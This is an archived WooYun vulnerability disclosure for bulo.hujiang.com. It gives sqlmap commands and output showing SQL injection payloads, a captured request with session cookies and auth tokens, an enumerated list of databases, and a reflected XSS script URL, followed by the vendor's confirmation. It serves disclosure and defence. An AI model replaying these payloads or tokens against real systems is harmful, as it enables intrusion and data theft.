乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-29: 细节已通知厂商并且等待厂商处理中 2015-12-30: 厂商已经确认,细节仅向厂商公开 2016-01-09: 细节向核心白帽子及相关领域专家公开 2016-01-19: 细节向普通白帽子公开 2016-01-29: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
听说有礼物-w-
title是注入参数,注入包为1.txt,内容如下sqlmap.py -r 1.txt
sqlmap identified the following injection point(s) with a total of 35 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Type=1Title=1%' AND 3814=3814 AND '%'=' Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: Type=1Title=1%' AND 8834=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8834=8834) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(112)+CHAR(113))) AND '%'='---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2012>
1.txt
POST /ajax/ASP.PageClass,App_Web_music_box.aspx.5df98d44.rasgroeb.ashx?p=rh9WhGz6z8TvuTfEaIBgigE0VSKHuMJQLgFc5JoJ-Pk1&_method=PageSearchMusic&_session=no HTTP/1.1Host: bulo.hujiang.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://bulo.hujiang.com/app/music/%E4%B9%9D%E6%9C%88%E6%88%90%E6%AE%87/Content-Length: 15Content-Type: text/plain; charset=UTF-8Cookie: _hotlink_uid=145106436134329; HJ_UID=df16267f-4618-bdb7-5117-120f8f46f8e4; TRACKSITEMAP=3%2C6%2C10%2C20%2C45%2C57%2C63%2C65%2C73%2C13%2C; _REF=; _SREF_10=http%3A%2F%2Fdict.hjenglish.com%2F; hj_token=s_daa18e800e251e3438da5c32193df0c7|MTE5NThkOA==; hjd_ajax_Language2011=en; __utma=249109652.1433456460.1451064409.1451064409.1451204932.2; __utmz=249109652.1451064409.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _SREF_6=http%3A%2F%2Fbulo.hujiang.com%2Fmenu%2F; ClubAuth=B83651E902FAAE8B8BCB9F8190710155E8D75A6ED1FAFD340097CC3AA015E2353EF999F57AF8D6168B7A9350F2A301418EED19ADF39ADDB54D5455A8DC31A0D3CBDBE9CE4966EE80E73348897F59ECC4E969B9A7905DF270CC7FFB4A2081E5088C23301C11FA65B98568E0F9B06D45093917A5918FA777920C5399A5360F6BCD107CCD0A337C685C243A7615DCEB3666FB476A92795E58C34FE99F68A1C12348022A4B62; _SREF_45=http%3A%2F%2Fms.hujiang.com%2Fdiary%2F; adsNewsTrueId=1663; news=true; _SREF_3=http%3A%2F%2Fms.hujiang.com%2Fdiary%2F; HJ_SID=9ef28c01-e16c-df99-25fb-3b5b95108673; HJ_CST=0; HJ_SSID_3=9d7120eb-9c1d-8a5f-eb4a-7735bb40782b; HJ_CSST_3=0; BuloMusicControl=0; _hotlink_source_track=http%3A//dict.hjenglish.com/; HJ_SSID_10=842075f2-5881-ae37-4a08-34e032bb0ba2; HJ_CSST_10=0; ingFrameHeight=1664; cck_lasttime=1451238877019; cck_count=0; bulo_tips_201208_nc=%7B%22tc%22%3A0%2C%22cc%22%3A0%2C%22fc%22%3A0%2C%22ac%22%3A0%2C%22pc%22%3A0%2C%22sc%22%3A0%2C%22mc%22%3A0%2C%22nc%22%3A0%2C%22st_atme%22%3A0%2C%22st_answer%22%3A0%2C%22st_sys%22%3A0%7DDNT: 1Connection: keep-aliveType=1Title=1*
sqlmap.py -r 1.txt --dbs
web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2012available databases [16]:[*] DBCenter[*] hj_cms[*] HJ_Cms_App[*] HJ_CmsExam[*] hj_cmsLog[*] HJ_CmsLogHistory[*] HJ_CMSZhong[*] HJ_Dict_New[*] HJ_External[*] HJ_K12SEOTiKu[*] HJ_Lexicon[*] HJ_Movie[*] master[*] model[*] msdb[*] tempdb
另外,反射型xss:http://t.hujiang.com/star/all/?key=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
如上
你比我更加专业-w-
危害等级:中
漏洞Rank:10
确认时间:2015-12-30 13:16
问题确认,正在处理,感谢。上述数据库未涉及重要业务系统数据库,故评级为中。
暂无